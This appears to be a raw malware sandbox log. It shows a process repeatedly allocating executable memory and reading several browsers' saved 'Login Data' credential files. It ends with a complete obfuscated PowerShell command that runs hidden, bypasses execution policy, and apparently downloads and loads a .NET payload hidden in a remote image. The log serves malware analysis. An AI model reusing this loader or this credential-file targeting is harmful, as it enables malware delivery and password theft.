stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72892000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2628
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02662000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2628
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02672000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2628
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02961000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2628
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02962000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2628
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0269a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2628
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02673000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2628
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02674000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2628
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ab000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2628
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2628
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0266b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2628
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02692000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2628
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2628
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02675000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2628
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0269c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2628
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a60000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2628
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02676000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2628
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ac000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2628
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02693000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2628
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02694000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2628
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02695000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2628
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02696000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2628
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02697000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2628
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02698000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2628
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02699000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2628
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04b00000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2628
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04b01000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2628
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04b02000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2628
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04b03000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2628
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04b04000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2628
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04b05000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2628
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04b06000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2628
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04b07000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2628
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04b08000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2628
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04b09000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2628
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04b0a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2628
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04b0b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2628
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04b0c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2628
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04b0d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2628
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04b0e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2628
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04b0f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2628
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c60000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2628
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c61000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2628
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c62000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2628
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c63000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2628
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c64000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file C:\Users\test22\AppData\Local\Chromium\User Data
file C:\Users\test22\AppData\Local\MapleStudio\ChromePlus\User Data
file C:\Users\test22\AppData\Local\Yandex\YandexBrowser\User Data
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('PzXsYGN','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
